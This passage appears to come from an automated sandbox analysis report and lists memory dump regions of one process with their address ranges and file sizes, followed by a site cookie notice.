                                                                                    • memory/3968-444-0x00007FFB301D0000-0x00007FFB30343000-memory.dmp

                                                                                      Filesize

                                                                                      1.4MB

                                                                                    • memory/3968-437-0x00007FFB41320000-0x00007FFB41344000-memory.dmp

                                                                                      Filesize

                                                                                      144KB

                                                                                    • memory/3968-329-0x00007FFB41290000-0x00007FFB412BD000-memory.dmp

                                                                                      Filesize

                                                                                      180KB

                                                                                    • memory/3968-489-0x00007FFB389B0000-0x00007FFB389C9000-memory.dmp

                                                                                      Filesize

                                                                                      100KB

                                                                                    • memory/3968-480-0x00007FFB2F030000-0x00007FFB2F3A5000-memory.dmp

                                                                                      Filesize

                                                                                      3.5MB

                                                                                    • memory/3968-487-0x00007FFB389F0000-0x00007FFB38A12000-memory.dmp

                                                                                      Filesize

                                                                                      136KB

                                                                                    • memory/3968-481-0x00007FFB3D840000-0x00007FFB3D855000-memory.dmp

                                                                                      Filesize

                                                                                      84KB

                                                                                    • memory/3968-479-0x00007FFB2FFD0000-0x00007FFB30088000-memory.dmp

                                                                                      Filesize

                                                                                      736KB

                                                                                    • memory/3968-478-0x00007FFB3D860000-0x00007FFB3D88E000-memory.dmp

                                                                                      Filesize

                                                                                      184KB

                                                                                    • memory/3968-469-0x00007FFB2F650000-0x00007FFB2FC38000-memory.dmp

                                                                                      Filesize

                                                                                      5.9MB

                                                                                    • memory/3968-792-0x00007FFB38450000-0x00007FFB3849D000-memory.dmp

                                                                                      Filesize

                                                                                      308KB

                                                                                    • memory/3968-791-0x00007FFB2FFD0000-0x00007FFB30088000-memory.dmp

                                                                                      Filesize

                                                                                      736KB

                                                                                    • memory/3968-805-0x00007FFB2F030000-0x00007FFB2F3A5000-memory.dmp

                                                                                      Filesize

                                                                                      3.5MB

                                                                                    • memory/3968-804-0x00007FFB3D810000-0x00007FFB3D81A000-memory.dmp

                                                                                      Filesize

                                                                                      40KB

                                                                                    • memory/3968-803-0x00007FFB38990000-0x00007FFB389A1000-memory.dmp

                                                                                      Filesize

                                                                                      68KB

                                                                                    • memory/3968-808-0x00007FFB382A0000-0x00007FFB382AD000-memory.dmp

                                                                                      Filesize

                                                                                      52KB

                                                                                    • memory/3968-807-0x00007FFB383F0000-0x00007FFB38426000-memory.dmp

                                                                                      Filesize

                                                                                      216KB

                                                                                    • memory/3968-806-0x00007FFB2D620000-0x00007FFB2DDC1000-memory.dmp

                                                                                      Filesize

                                                                                      7.6MB

                                                                                    • memory/3968-802-0x00007FFB389B0000-0x00007FFB389C9000-memory.dmp

                                                                                      Filesize

                                                                                      100KB

                                                                                    • memory/3968-801-0x00007FFB389D0000-0x00007FFB389E7000-memory.dmp

                                                                                      Filesize

                                                                                      92KB

                                                                                    • memory/3968-800-0x00007FFB389F0000-0x00007FFB38A12000-memory.dmp

                                                                                      Filesize

                                                                                      136KB

                                                                                    • memory/3968-799-0x00007FFB3BA00000-0x00007FFB3BA17000-memory.dmp

                                                                                      Filesize

                                                                                      92KB

                                                                                    • memory/3968-798-0x00007FFB2FEB0000-0x00007FFB2FFCC000-memory.dmp

                                                                                      Filesize

                                                                                      1.1MB

                                                                                    • memory/3968-797-0x00007FFB3D890000-0x00007FFB3D8B3000-memory.dmp

                                                                                      Filesize

                                                                                      140KB

                                                                                    • memory/3968-796-0x00007FFB3CC30000-0x00007FFB3CC44000-memory.dmp

                                                                                      Filesize

                                                                                      80KB

                                                                                    • memory/3968-795-0x00007FFB3D820000-0x00007FFB3D832000-memory.dmp

                                                                                      Filesize

                                                                                      72KB

                                                                                    • memory/3968-794-0x00007FFB3D840000-0x00007FFB3D855000-memory.dmp

                                                                                      Filesize

                                                                                      84KB

                                                                                    • memory/3968-793-0x00007FFB2F650000-0x00007FFB2FC38000-memory.dmp

                                                                                      Filesize

                                                                                      5.9MB

                                                                                    • memory/3968-790-0x00007FFB3D860000-0x00007FFB3D88E000-memory.dmp

                                                                                      Filesize

                                                                                      184KB

                                                                                    • memory/3968-789-0x00007FFB301D0000-0x00007FFB30343000-memory.dmp

                                                                                      Filesize

                                                                                      1.4MB

                                                                                    • memory/3968-788-0x00007FFB3CC10000-0x00007FFB3CC24000-memory.dmp

                                                                                      Filesize

                                                                                      80KB

                                                                                    • memory/3968-787-0x00007FFB41290000-0x00007FFB412BD000-memory.dmp

                                                                                      Filesize

                                                                                      180KB

                                                                                    • memory/3968-786-0x00007FFB412C0000-0x00007FFB412D9000-memory.dmp

                                                                                      Filesize

                                                                                      100KB

                                                                                    • memory/3968-785-0x00007FFB412E0000-0x00007FFB412ED000-memory.dmp

                                                                                      Filesize

                                                                                      52KB

                                                                                    • memory/3968-784-0x00007FFB412F0000-0x00007FFB41309000-memory.dmp

                                                                                      Filesize

                                                                                      100KB

                                                                                    • memory/3968-783-0x00007FFB41310000-0x00007FFB4131F000-memory.dmp

                                                                                      Filesize

                                                                                      60KB

                                                                                    • memory/3968-782-0x00007FFB41320000-0x00007FFB41344000-memory.dmp

                                                                                      Filesize

                                                                                      144KB

                                                                                    • memory/3968-781-0x00007FFB38430000-0x00007FFB3844E000-memory.dmp

                                                                                      Filesize

                                                                                      120KB

                                                                                    We care about your privacy.

                                                                                    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.